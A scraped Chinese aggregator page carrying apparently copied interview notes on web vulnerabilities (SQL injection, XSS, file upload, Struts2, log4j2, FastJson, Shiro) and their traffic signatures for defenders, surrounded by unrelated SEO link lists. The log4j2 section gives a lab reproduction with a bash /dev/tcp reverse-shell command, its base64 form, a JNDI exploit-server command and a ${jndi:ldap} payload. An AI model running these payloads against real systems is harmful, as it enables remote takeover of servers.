当前位置: 首页 > news >正文

国美网站建设的特点扁平化设计 科技感网站素材

国美网站建设的特点,扁平化设计 科技感网站素材,长宁区科技网站建设,宣传画册在这里给大家推荐一个阿里云的活动#xff0c;可白嫖一年2h4g服务器 活动链接#xff1a;https://university.aliyun.com/mobile?clubTaskBizsubTask…11404246…10212…userCodeks0bglxp 一、漏洞分析 1.SQL注入 原理#xff1a; 当Web应用向后台数据库传递SQL…在这里给大家推荐一个阿里云的活动可白嫖一年2h4g服务器 活动链接https://university.aliyun.com/mobile?clubTaskBizsubTask…11404246…10212…userCodeks0bglxp 一、漏洞分析 1.SQL注入 原理 当Web应用向后台数据库传递SQL语句进行数据库操作时如果对用户输入的参数没有经过严格的过滤处理那么攻击者就可以构造特殊的SQL语句直接输入数据库引擎执行获取或修改数据库中的数据 危害 泄露大量的用户信息。 获取管理员密码攻击者也可以通过获取到的数据得到后台管理员的密码然后对网页页面进行恶意篡改。这样不仅对数据库信息安全造成严重威胁对整个数据库系统安全也影响重大。 删除数据库对企业造成重大损失。 1.1.SQL注入常见关键字 1.user()返回当前使用数据库的用户 2.current_user()返回当前用户所对应的授权用户 3.version()返回当前数据库版本信息 4.database()返回当前数据库名 5.group_concat()把数据库中的某列数据或几列数据合并为一个字符串 6.datadir数据库路径 7.version_compile_os操作系统版本 1.2.分类 1.联合查询 2.布尔盲注 length(),ascii(),mid(),substr(),ord() 3.时间盲注 if(),sleep().benchmark() 4.报错注入 5.宽字节注入 2.XSS 原理 跨站脚本Cross-site scripting简称XSS,是指恶意攻击者往Web页面里插入恶意代码当用户浏览该页之时嵌入其中Web页面的HTML代码会被执行从而达到恶意攻击用户的目的。 危害 1钓鱼欺骗最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站或者注入钓鱼 JavaScript 以监控目标网站的表单输入甚至发起基于 DHTML 更高级的钓鱼攻击方式。 2网站挂马跨站时利用 IFrame 嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站上或者弹出恶意网站窗口等方式都可以进行挂马攻击。 3身份盗用Cookie 是用户对于特定网站的身份验证标志XSS 可以盗取到用户的 Cookie从而利用该 Cookie 盗取用户对该网站的操作权限。如果一个网站管理员用户 Cookie 被窃取将会对网站引发巨大的危害。 4盗取网站用户信息当能够窃取到用户 Cookie 从而获取到用户身份使攻击者可以获取到用户对网站的操作权限从而查看用户隐私信息。 5垃圾信息发送比如在 SNS 社区中利用 XSS 漏洞借用被攻击者的身份发送大量的垃圾信息给特定的目标群。 6劫持用户 Web 行为一些高级的 XSS 攻击甚至可以劫持用户的 Web 行为监视用户的浏览历史发送与接收的数据等等。 7XSS 蠕虫XSS 蠕虫可以用来打广告、刷流量、挂马、恶作剧、破坏网上数据、实施 DDoS 攻击等。 1.1分类 反射性:也叫做非持久型XSS。攻击者将恶意脚本附加到 url 的参数中发送给受害者服务端未经严格过滤处理而输出在用户浏览器中导致浏览器执行代码数据。 存储型:也叫做持久型XSS。存储型XSS会被保存到数据库在其他用户访问到这条数据时这个代码会在访问用户的浏览器端执行。 DOM型 3.文件上传漏洞 原理 上传文件的时候如果服务器端后端语言未对上传的文件进行严格的验证和过滤就容易造成上传任意文件的情况。常见场景是web服务器允许用户上传图片或者普通文本文件保存而攻击者绕过上传机制上传恶意代码文件并执行从而控制服务器。 危害 攻击者通过上传恶意文件传递给解释器去执行然后就可以在服务器上执行恶意代码进行数据库执行、服务器文件管理、命令执行等恶意操作。从而控制整个网站甚至是服务器。 1.1.漏洞防御措施 1、 上传的目录设置为不可执行。只要web容器无法解析该目录下面的文件即使攻击者上传了脚本文件服务器本身也不会受到影响因此这一点至关重要。 2、 对文件后缀的判断中使用白名单的方式。 3、 文件服务器和web服务器分离也就是上传的文件单独存放到其他的服务器之中。 4、 不需要返回文件路径的情况下随机改写文件名。 4.跨站请求伪造漏洞 5.服务器请求伪造 6.RCE 7.Struts2-045 漏洞原因 基于Jakarta Multipart parser的文件上传模块在处理文件上传(multipart)的请求时候对异常信息做了捕获并对异常信息做了OGNL表达式处理。但在在判断content-type不正确的时候会抛出异常并且带上Content-Type属性值可通过精心构造附带OGNL表达式的URL导致远程代码执行。 8.log4j2必问 漏洞原理: log4j2 中存在 JNDI 注入漏洞当程序记录用户输入的数据时即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。 下面是触发漏洞的两部分关键代码: 1.org·apache.logging.log4j.core.pattern.MessagePatternconverter 的 format()方法(表达式内容替换) 2.apache.logging.log4j.core.lookup.StrSubstitutor(提取字符串并通过 lookup 进行内容替换) 这部分内容重点就在于代码的主要内容就是一旦发现日志中包含 ${}就会将表达式的内容替换为表达式解析后的内容而不是表达式本身从而导致攻击者构造符合要求的表达式供系统执行。 在 ${}中可以使用的部分关键词如下: ${java:version}getSystemProperty(java.version) ${java:runtime} getRuntime() ${java:vm) getVirtualMachine() ${java:os} getOperatingSystem() ${java:hw} getHardware( ) ${java:locale} getLocale()${env:CLASSPATH} ${env:HOME} ${env:JAVA_HOME} ${env:LANG} ${env:LC_TERMINAL}${jndi:ldap://ip/port/exp}最终效果就是通过jndi 注入借助 ldap 服务来下载执行恶意 payload从而执行命令 JNDI介绍 Java Naming and Directory InterfaceJAVA命名和目录接口(命名服务接口)应用通过该接口与具体的目录服务进行交互允许通过名称发现和查找数据或对象可用于动态加载配置等。 JNDI可以访问以下命名/目录服务: 。RMI(JAVA远程方法调用) 。LDAP(轻量级目录访问协议) 。CORBA(公共对象请求代理体系结构) 。DNS(域名服务) LDAP协议 LDAP(Ligntweight Directory Access Protocol)轻量级目录访问协议既是一种服务也是一种协议是JNDI的一种底层实现主要功能是提供命名关键字到对象的映射目录开发人员可以通过输入名称获取到对象的内容。简单来说就是搜索功能它是分布式的允许从远程服务器上面加载获取对象。默认服务端口389 复现过程 首先检测站点是否存在JNDI注入漏洞 使用dnslog平台生成一个临时域名 在要测试的站点中使用jndi访问此域名若能解析代表存在jndi注入漏洞 注入点是/admin/cores?action 那么就在此处传入192.168.31.63:8983/solr/admin/cores?action${jndi:dns://ylx7kn.dnslog.cn} 发现dnslog平台有解析记录说明该站点存在此jndi注入漏洞 1.构造反弹shell payload 将目标shell反弹到 192.168.31.90/6666 上 bash -i /dev/tcp/192.168.31.90/6666 01 进行base64编码因为可能会对特殊字符进行过滤 bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjMxLjkwLzY2NjYgMD4mMQ}|{base64,-d}|{bash,-i} 使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar将我们的攻击机作为ldap服务端 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjMxLjkwLzY2NjYgMD4mMQ}|{base64,-d}|{bash,-i}” -A “192.168.31.90” 开启监听我们攻击机的6666端口 随后在存在JNDI注入漏洞的站点将我们构造好的payload传入 http://192.168.31.63:8983/solr/admin/cores?action${jndi:ldap://192.168.31.90:1389/Exploit} 返回攻击机查看发现成功拿到目标shell 9.FastJson 原理 fastjson 在解析 json 的过程中支持使用 autoType 来实例化某一个具体的类就会读取 type 的内容试图把JSON内容反序列化成这个对象并调用该类的 set/get 方法来访问属性。通过查找代码中相关的方法即可构造出一些恶意利用链 java.net.InetAddress 这个类在实例化时会尝试对 example.com 进行域名解析这时候可以通过 dnslog的方式得知漏洞是否存在比如如下的存在 {name :{type :java.net.InetAddressva1:任意字符,qydzoe.dnslog.cn} }{name : {type :Ljava.net.InetAddress;val:任意字符.qydzoe.dnslog.cn} }{name :{type:LLjava.net.InetAddress;va1:任意字符.qydzoe.dnslog.cn} }10.shiro-550 一句话总结shiro框架提供了记住密码的功能然后在生成cookie时使用了AES加密AES是对称加密采用了默认秘钥。所以攻击就能使用默认秘钥进行构造恶意cookie从而达到反弹shell Shiro550和Shiro721利用过程中有着显著的区别 1、Shiro550漏洞使用已知的密钥进行攻击(秘钥是固定或者默认的)这意味着攻击者可以利用硬编码的AES密钥来构造恶意的序列化对象。攻击者不需要拥有有效的RememberMe Cookier来执行攻击只要有足够的密钥库即可。 2、Shiro721漏洞加密使用的密钥是系统随机生成的这使得攻击者难以直接猜测或使用已知的密钥进行攻击。攻击者需要利用登录后的RememberMe Cookie作为Padding Oracle Attack的前缀然后精心构造RememberMe Cookie值来实现反序列化漏洞攻击。相比Shiro550Shiro721的利用条件更高因为它要求攻击者已经拥有一个有效的登录会话 二、流量特征 1.SQL注入流量分析 会有明显的注入语句。判断是否注入成功可以查找是否返回数据库名通过 因为我们是防守人员可以直接查找响应中是否返回了我们的数据库名 sqlmap流量特征 sqlmap会在注入点尝试大量的注入可以明显观察到很多相似的数据流 最重要的是sqlmap会将自己的版本号在UA投中输出 2.XSS流量分析 反射型在url中能观察到明显的js语句 3.文件上传流量分析 上传正常文件时流量会显示正确的文件类型 查看正常上传的响应包 而如果上传的是木马文件则不会在流量描述中显示文件类型 可以查看上传的内容显示分组字节发现是一句话木马 攻击者会验证是否上传成功这种流量则是能够查看到访问了文件上传的目录且通过追踪流会看到执行了什么命令 4.目录扫描流量分析 会有大量404切夹杂着很多不同目录 5.口令爆破流量分析 会有大量相同的请求长度且响应长度相同 在响应长度中会有一个不同的这个就是爆破成功的响应 查看传入数据也为正确 6.RCE流量分析 可以看到whoami这是明显的命令 在响应中也找到了whoami执行的结果 可以查看到明显的木马 再查看响应 这种木马是输出了一个文件所以这里无法查看那么就要看攻击者是否使用了一句话木马 发现访问此前上传的木马并且扎起下方有一个post请求查看post请求执行了什么 这说明攻击者已经拿到了服务器的控制权了 7.log4j2流量分析 网站流量中有明显的jndi注入语句 且在利用时会请求恶意的java类 查看此流量可以观察到base64编码后的反弹shell命令 8.FastJson流量分析 tyep 9.shiro流量分析 工具探测shiro流量 请求包这种cookie会有remenberMeyes 爆破秘钥流量会有大量探测cookie的请求包 没有爆破成功会有响应remenberMedeletMe 成功则没有 命令执行流量特征 请求包中会有执行的命令且响应包会返回对应命令的结果 10.Struts2流量分析 工具探测流量 会有大量相似请求且其中会有大量%且会有multipart/from-data 命令执行流量 Struts2-045 会更改Content-Type且会在其中看到命令 命令执行结果是通过tcp流量传回 11.weblogic流量分析 大部分是t3协议
http://www.zqtcl.cn/news/603404/

相关文章:

  • 网站开发的有哪些好的软件wordpress菜单栏的函数调用
  • 家庭清洁东莞网站建设技术支持建筑模板厂投资多少钱
  • 郑州企业建站详情网站开发和网页开发有什么区别
  • 山西古建筑网站个人网站可以做自媒体吗
  • 腾讯云服务器可以做网站wordpress中文正式版
  • 做相亲网站赚钱吗vultr部署wordpress
  • 网站被挂马原因做网站较好的框架
  • 网站开发毕业设计参考文献自考大型网站开发工具
  • p2p网站建设方案策划书黄山旅游攻略冬季
  • 最世网络建设网站可以吗小说网站制作开源
  • 广州网站建设知名 乐云践新网页界面制作
  • 沈阳网站哪家公司做的好招标信息发布
  • 兰州企业网站h5页面用什么软件
  • 东莞自助建站软件ppt怎么做 pc下载网站
  • 兴化网站建设价格怎样用自己的电脑,做网站
  • 东莞网站建设企慕网站名称 注册
  • 佛山网站建设服务商百度推广客户端手机版下载
  • 做网站找个人还是找公司wordpress jiathis
  • 淘宝客推广网站建设百度云wordpress转服务器
  • 网站构建代码模板怎么在云服务器上建设网站
  • 国内产品网站建设游戏创造器
  • 北京南站到北京站怎么走南宁美丽南方官方网站建设意见
  • 网站建设捌金手指专业5电商运营怎么推广一个新品
  • 医院网站建设企业走廊文化建设图片网站
  • 学网站建设培训机构公司网站建立费用
  • 阜宁网站制作服务商自学网站开发设计
  • 湖南建设监理工程网站设计类招聘网站
  • 门户网站建设的平台搭建长春专业网站建设推广
  • 网站建设宗旨怎么写网站建设公司外链怎么做
  • 绍兴市交通建设检测中心网站seo专业培训网络班